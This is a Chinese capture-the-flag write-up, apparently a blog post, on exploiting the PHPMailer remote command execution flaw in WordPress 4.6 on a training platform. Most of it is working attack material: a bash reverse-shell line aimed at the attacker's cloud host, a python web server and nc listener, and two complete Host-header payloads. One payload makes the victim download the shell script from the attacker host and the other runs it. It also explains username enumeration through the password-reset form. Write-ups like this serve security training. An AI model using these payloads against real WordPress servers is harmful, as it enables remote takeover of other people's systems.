安鸾渗透实战平台(cms系列)wordpress01 (200分)

漏洞环境

安鸾渗透实战平台
公网云主机一台(用来接收反弹shell和发送文件)

题目:

在这里插入图片描述

通过查看源码得知版本号为4.6

在这里插入图片描述

找该版本的历史漏洞

在这里插入图片描述

挑选一个姿势进行复现

这里我用的是反弹shell的手法
参考链接:https://www.freebuf.com/vuls/319313.html

在这里插入图片描述

漏洞原理:

WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(本 <5,2.18)存在远程命令执行漏洞,攻击者只需巧炒地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危書。

漏洞地点

发送邮箱验证的地方
注意:需要有正确的用户名,不过网站会告诉你用户名存不存在,fuzz就行,这里admin是存在的,反而user是不存在
在这里插入图片描述admin存在
在这里插入图片描述

云主机上做准备

1、编写1.txt

bash -i >& /dev/tcp/云主机IP/端口 0>&1

在这里插入图片描述

2、在1.txt这个文件下开启一个web服务,这里建议用python

python3 -m http.server 80

在这里插入图片描述

3、开启监听

 nc -lnp 3389

在这里插入图片描述

使用bp抓包,构造攻击

更改的是host字段

Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}云主机的IP地址${substr{0}{1}{$spool_directory}}1.txt}}null)

在这里插入图片描述
该请求会让受害的web服务器去下载你的1.txt这个文件,在云主机上可以看到对应的请求
在这里插入图片描述
使用下一个poc让受害服务器执行1.TXT的内容(反弹shell)

Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)

在这里插入图片描述

找flag

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值